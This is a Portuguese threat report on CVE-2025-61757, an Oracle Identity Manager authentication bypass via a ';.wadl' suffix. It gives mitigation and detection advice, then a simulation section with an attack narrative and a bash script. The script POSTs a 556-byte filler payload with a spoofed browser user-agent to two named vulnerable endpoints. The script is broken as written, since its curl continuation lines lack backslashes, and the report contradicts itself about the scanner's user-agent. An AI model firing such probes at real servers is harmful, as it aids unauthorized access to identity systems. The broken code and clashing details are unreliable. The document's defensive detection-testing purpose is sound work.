CVE-2025-61757: Atividade Exploratória do Oracle Identity Manager Observada em Setembro

Resumo

O relatório detalha uma falha de bypass de autenticação no Oracle Identity Manager que permite que atores não autenticados acessem URLs arbitrárias adicionando um sufixo “;.wadl”, o que, em última instância, possibilita a execução remota de código. A vulnerabilidade (CVE-2025-61757) foi observada sendo investigada e explorada no campo antes que a Oracle liberasse uma correção. Analistas registraram múltiplos IPs de escaneamento emitindo requisições POST com uma string de user-agent distinta. Atividades subsequentes também incluíram sondagens para outra falha no Oracle (CVE-2025-4581) e tentativas de provocar explorações do Log4j.

Investigação

A análise de logs revelou requisições POST repetidas para os endpoints do Oracle Identity Manager terminando em “;.wadl” durante o período de final de agosto a início de setembro de 2025. Todas essas requisições compartilhavam um valor de user-agent idêntico, apontando para um scanner ou kit de ferramentas comum. Cada requisição carregava um payload com um comprimento consistente de 556 bytes, embora os corpos em si não tenham sido armazenados. A mesma fonte também investigou URLs associadas a outras vulnerabilidades conhecidas, expandindo a superfície suposta de exploração.

Mitigação CVE-2025-61757

A Oracle abordou o CVE-2025-61757 em sua Atualização Crítica de Patches de outubro, liberada em 21/10/2025. As equipes de segurança devem implantar prontamente os patches mais recentes da Oracle, aplicar autenticação forte em todos os endpoints do Oracle Identity Manager e monitorar ativamente padrões de requisições incomuns com “;.wadl”. Passos adicionais de fortalecimento incluem bloquear a string de user-agent identificada na borda, restringir tamanhos de requisições POST e apertar a exposição de WADL e configurações relacionadas sempre que possível.

Resposta

Configure detecções para sinalizar qualquer tráfego HTTP que inclua o sufixo “;.wadl”, concentrando-se em requisições POST com payloads de aproximadamente 556 bytes. Correlacione esses eventos com a impressão digital conhecida do user-agent e endereços IP de origem. Confirme que cada instância do Oracle Identity Manager no ambiente esteja atualizada para uma versão corrigida e verifique se os recursos “.wadl” não são diretamente acessíveis a partir de redes não confiáveis.

Execução de Simulação

Pré-requisito: A Verificação Prévia de Telemetria e Linha de Base deve ter sido aprovada.

Justificativa: Esta seção detalha a execução precisa da técnica do adversário (TTP) projetada para acionar a regra de detecção. Os comandos e a narrativa DEVEM refletir diretamente os TTPs identificados e visam gerar a telemetria exata esperada pela lógica de detecção. Exemplos abstratos ou não relacionados levarão a um diagnóstico incorreto.

• Narrativa de Ataque & Comandos:

  Um invasor, tendo identificado uma instância não corrigida do Oracle Identity Manager, elabora um payload WADL malicioso que explora a CVE‑2025‑61757. O payload tem exatamente 556 bytes de comprimento (como exigido pela prova de conceito) e é enviado via HTTP POST para dois URIs vulneráveis conhecidos. Para evitar heurísticas de detecção triviais, o invasor imita uma string de user‑agent de um navegador comum. A entrega bem-sucedida aciona a desserialização do lado do servidor, levando à execução remota de código.

• Script de Teste de Regressão:

  #!/usr/bin/env bash
  set -euo pipefail
  
  # Servidor de destino (substitua pelo endereço real do servidor)
  TARGET="http://localhost"
  
  # User-agent de navegador comum usado pela regra
  UA="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, como Gecko) Chrome/60.0.3112.113 Safari/537.36"
  
  # Payload malicioso exato de 556 bytes (simulado com caracteres “A” repetidos)
  PAYLOAD=$(printf 'A%.0s' {1..556})
  
  # Endpoints vulneráveis
  ENDPOINTS=(
    "/iam/governance/applicationmanagement/templates;.wadl"
    "/iam/governance/applicationmanagement/api/v1/applications/groovyscriptstatus;.wadl"
  )
  
  for EP in "${ENDPOINTS[@]}"; do
    echo "[*] Enviando exploração para $TARGET$EP"
    curl -s -o /dev/null -w "%{http_code}n" 
         -X POST "$TARGET$EP" 
         -H "User-Agent: $UA" 
         -H "Content-Type: application/xml" 
         -d "$PAYLOAD"
  done
  
  echo "[+] Tentativas de exploração concluídas."

• Comandos de Limpeza:

  # Nenhuma alteração persistente no servidor web para este PoC.
  # Remova quaisquer arquivos temporários criados localmente.
  rm -f /tmp/exploit_payload.tmp 2>/dev/null || true
  echo "[*] Limpeza concluída."